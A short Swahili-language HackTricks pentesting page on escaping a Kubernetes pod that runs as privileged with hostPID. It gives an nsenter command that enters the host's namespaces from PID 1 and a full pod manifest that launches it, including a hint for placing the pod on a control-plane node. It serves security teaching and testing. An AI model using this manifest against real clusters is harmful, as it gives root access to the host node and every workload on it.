Pod Escape Privileges

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Mamlaka ya Kipekee na hostPID

Kwa mamlaka haya utakuwa na upatikanaji wa michakato ya mwenyeji na mamlaka za kutosha kuingia ndani ya eneo la jina la moja ya michakato ya mwenyeji. Tafadhali kumbuka kuwa huenda usihitaji mamlaka ya kipekee lakini tu baadhi ya uwezo na njia zingine za kuepuka ulinzi (kama apparmor na/au seccomp).

Kutekeleza kitu kama hicho ifuatavyo kutakuruhusu kutoroka kutoka kwa podi:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Mfano wa usanidi:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Last updated